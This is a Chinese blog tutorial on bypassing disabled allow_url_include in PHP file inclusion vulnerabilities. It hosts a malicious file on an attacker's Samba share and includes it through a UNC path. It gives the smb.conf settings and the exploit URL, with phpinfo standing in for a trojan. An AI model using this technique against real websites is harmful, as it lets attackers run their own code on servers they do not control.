文件包含之SMB文件共享

这篇具有很好参考价值的文章主要介绍了文件包含之SMB文件共享。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

文章目录

  • 前言
  • 一、SMB是什么?
  • 二、使用步骤
    • 1.在服务器上搭建SMB服务
    • 2.在网站下利用文件包含语句访问我们的共享文件的恶意文
  • 总结

前言

当我们利用文件包含漏洞的时候,对方服务器的allow_url_includeallow_url_fopen设置为off时,我们绕过的姿势基本上被防住了,这时,我们可以利用SMB文件共享来pass


一、SMB是什么?

 

SMB (Server Messages Block,信息服务块)是一种在局 域网上共享文件和打印机的一种通信协议,它为局域网内的不同 计算机之间提供文件及打印机等资源的共享服务。

二、使用步骤

1.在服务器上搭建SMB服务

这里我们就用Kali来搭建:

1.首先我们下载samba

agt-get install samba

2.配置samba

  1.先开启apache服务,然后到apache网站根目录下创建一个文件夹,配置文件夹的属性,具体步骤如下:

smb文件共享上传文件,python,机器学习,开发语言,web安全,系统安全     smb文件共享上传文件,python,机器学习,开发语言,web安全,系统安全

 

 

2.进入samba配置文件目录配置smb.conf,具体步骤如下

       1.先清空smb.conf文件

       2.配置smb.conf文件

smb文件共享上传文件,python,机器学习,开发语言,web安全,系统安全

                  相关配置为

                             

 [global]
     workgroup = WORKGROUP
     server string = Samba Server %v
     netbios name = indishell-lab
     security = user
     map to guest = bad user
     name  resolve order = bcast host
     dns proxy = no 
     bind interfaces only = yes
     [ica]
     path = /var/www/html/ctfsmb    //这里是我们创建文件夹名
     writable = no
     guest ok = yes
     read only = yes
     directory moded = 0555

       3.重启smb服务

         

service smbd restart

       4.验证是否配置成功

               我们在物理机上文件目录一栏输入服务器(也就是kali)的网址

\\+ip

               出现下图就说明配置成功smb文件共享上传文件,python,机器学习,开发语言,web安全,系统安全

 

   5.成功后我们在共享文件夹里面植入木马文件,这里我们用phpinfo替代

      smb文件共享上传文件,python,机器学习,开发语言,web安全,系统安全

phpinfo.php的内容为:

<?php phpinfo();?>

 

2.在网站下利用文件包含语句访问我们的共享文件的恶意文件

http://127.0.0.1/cms/root/include.php?file=\\192.168.43.170\ica\phpinfo.php

smb文件共享上传文件,python,机器学习,开发语言,web安全,系统安全

 

注意:这里的网站目录是我们提前信息收集得到的含有文件包含漏洞的目录


总结

提示:这里对文章进行总结:
例如:以上就是今天要讲的内容,本文仅仅简单介绍了SMB文件包含的使用,希望对大家有有所帮助,喜欢的可以收藏加关注哦,小编会持续更新相关渗透知识。文章来源地址https://www.toymoban.com/news/detail-638591.html

到了这里,关于文件包含之SMB文件共享的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包